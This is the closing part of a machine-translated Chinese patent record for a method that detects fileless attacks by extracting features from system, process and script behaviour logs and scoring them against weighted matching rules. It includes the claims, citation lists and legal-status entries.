The steps of a method or algorithm described in connection with the embodiments disclosed herein may be embodied directly in hardware, in a software module executed by a processor, or in a combination of the two. A software module may reside in Random Access Memory (RAM), memory, Read Only Memory (ROM), electrically programmable ROM, electrically erasable programmable ROM, registers, hard disk, a removable disk, a CD-ROM, or any other form of storage medium known in the art.
The attack detection method, the attack detection device, the server and the computer readable storage medium provided by the present application are described in detail above. The principles and embodiments of the present application are explained herein using specific examples, which are provided only to help understand the method and the core idea of the present application. It should be noted that, for those skilled in the art, it is possible to make several improvements and modifications to the present application without departing from the principle of the present application, and such improvements and modifications also fall within the scope of the claims of the present application.

Claims (10)

1. An attack detection method, comprising:
acquiring a behavior log; the behavior log comprises one or more combinations of system behavior information, process behavior information, script behavior information and framework behavior information;
performing feature extraction on the behavior log to obtain behavior features; the behavior characteristics comprise one or more combinations of memory buffer characteristics, execution context characteristics, process dump file characteristics and abnormal load characteristics;
and carrying out attack detection based on the behavior characteristics to obtain a detection result.
2. The attack detection method according to claim 1, wherein the obtaining a behavior log comprises:
and acquiring the behavior log through a system monitoring tool and/or an interface hook and/or an anti-malware scanning interface.
3. The attack detection method according to claim 1, wherein performing attack detection based on the behavior characteristics to obtain a detection result comprises:
matching the behavior characteristics based on a plurality of file-free attack matching rules to obtain a matching result;
and carrying out attack score calculation on the matching result to obtain the detection result.
4. The attack detection method according to claim 3, wherein matching the behavior features based on a plurality of file-free attack matching rules to obtain matching results comprises:
setting an independent sub-process for each file attack-free matching rule; each subprocess corresponds to a non-file attack means, and each subprocess is provided with different weights;
performing file-free attack matching on the behavior characteristics based on each subprocess to obtain a matching result;
correspondingly, calculating the attack score of the matching result to obtain the detection result, wherein the calculation comprises the following steps:
and carrying out attack score calculation on the matching result based on the weight of each subprocess to obtain the detection result.
5. The attack detection method according to claim 1, further comprising:
extracting matched rules and matched features in the matching result;
matching a danger level based on the score of the detection result;
and performing summary generation processing based on the matched rule, the matched features and the danger level to obtain an analysis summary.
6. The attack detection method according to claim 1, further comprising:
and carrying out abnormal attack processing based on the detection result.
7. The attack detection method according to claim 1, further comprising:
performing suspicious log summarizing processing based on the detection result to obtain a suspicious behavior log;
and displaying the suspicious logs through a visual management platform.
8. An attack detection apparatus, comprising:
the behavior log acquisition module is used for acquiring a behavior log; the behavior log comprises one or more combinations of system behavior information, process behavior information, script behavior information and framework behavior information;
the behavior characteristic extraction module is used for extracting the characteristics of the behavior log to obtain behavior characteristics; the behavior characteristics comprise one or more combinations of memory buffer characteristics, execution context characteristics, process dump file characteristics and abnormal load characteristics;
and the file-free attack detection module is used for carrying out attack detection based on the behavior characteristics to obtain a detection result.
9. A server, comprising:
a memory for storing a computer program;
a processor for implementing the steps of the attack detection method according to any one of claims 1 to 7 when executing the computer program.
10. A computer-readable storage medium, characterized in that a computer program is stored on the computer-readable storage medium, which computer program, when being executed by a processor, carries out the steps of the attack detection method according to any one of claims 1 to 7.
CN202111152699.XA 2021-09-29 2021-09-29 Attack detection method and related device Pending CN113886814A (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202111152699.XA CN113886814A (en) 2021-09-29 2021-09-29 Attack detection method and related device

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN202111152699.XA CN113886814A (en) 2021-09-29 2021-09-29 Attack detection method and related device

Publications (1)

Publication Number Publication Date
CN113886814A true CN113886814A (en) 2022-01-04

Family

ID=79008130

Family Applications (1)

Application Number Title Priority Date Filing Date
CN202111152699.XA Pending CN113886814A (en) 2021-09-29 2021-09-29 Attack detection method and related device

Country Status (1)

Country Link
CN (1) CN113886814A (en)

Cited By (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN114900352A (en) * 2022-04-25 2022-08-12 中国工商银行股份有限公司 Bypass blocking method, bypass blocking apparatus, electronic device, bypass blocking medium, and program product
CN115174201A (en) * 2022-06-30 2022-10-11 北京安博通科技股份有限公司 Security rule management method and device based on screening label
CN116366377A (en) * 2023-06-02 2023-06-30 深信服科技股份有限公司 Malicious file detection method, device, equipment and storage medium

Cited By (5)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN114900352A (en) * 2022-04-25 2022-08-12 中国工商银行股份有限公司 Bypass blocking method, bypass blocking apparatus, electronic device, bypass blocking medium, and program product
CN115174201A (en) * 2022-06-30 2022-10-11 北京安博通科技股份有限公司 Security rule management method and device based on screening label
CN115174201B (en) * 2022-06-30 2023-08-01 北京安博通科技股份有限公司 Security rule management method and device based on screening tag
CN116366377A (en) * 2023-06-02 2023-06-30 深信服科技股份有限公司 Malicious file detection method, device, equipment and storage medium
CN116366377B (en) * 2023-06-02 2023-11-07 深信服科技股份有限公司 Malicious file detection method, device, equipment and storage medium

Similar Documents

Publication Publication Date Title
US10872151B1 (en) System and method for triggering analysis of an object for malware in response to modification of that object
CN113886814A (en) Attack detection method and related device
EP2955894B1 (en) Deception network system
EP2769508B1 (en) System and method for detection of denial of service attacks
CN113661693A (en) Detecting sensitive data exposure via logs
CN107612924B (en) Attacker positioning method and device based on wireless network intrusion
CN107295021B (en) Security detection method and system of host based on centralized management
CN112637220A (en) Industrial control system safety protection method and device
CN107465702B (en) Early warning method and device based on wireless network intrusion
US11909761B2 (en) Mitigating malware impact by utilizing sandbox insights
CN108234480B (en) Intrusion detection method and device
CN109787964B (en) Process behavior tracing device and method
CN107566401B (en) Protection method and device for virtualized environment
CN110868403B (en) Method and equipment for identifying advanced persistent Attack (APT)
CN111464526A (en) Network intrusion detection method, device, equipment and readable storage medium
CN113901450A (en) Industrial host terminal safety protection system
CN113595975B (en) Detection method and device for Webshell of Java memory
CN108566392B (en) Machine learning-based system and method for preventing CC attack
CN113489703A (en) Safety protection system
CN112347484A (en) Software vulnerability detection method, device, equipment and computer readable storage medium
CN111104670A (en) APT attack identification and protection method
CN107517226B (en) Alarm method and device based on wireless network intrusion
CN113569240B (en) Method, device and equipment for detecting malicious software
CN115913634A (en) Network security abnormity detection method and system based on deep learning
CN115766051A (en) Host safety emergency disposal method and system, storage medium and electronic equipment

Legal Events

Date Code Title Description
PB01 Publication
PB01 Publication
SE01 Entry into force of request for substantive examination
SE01 Entry into force of request for substantive examination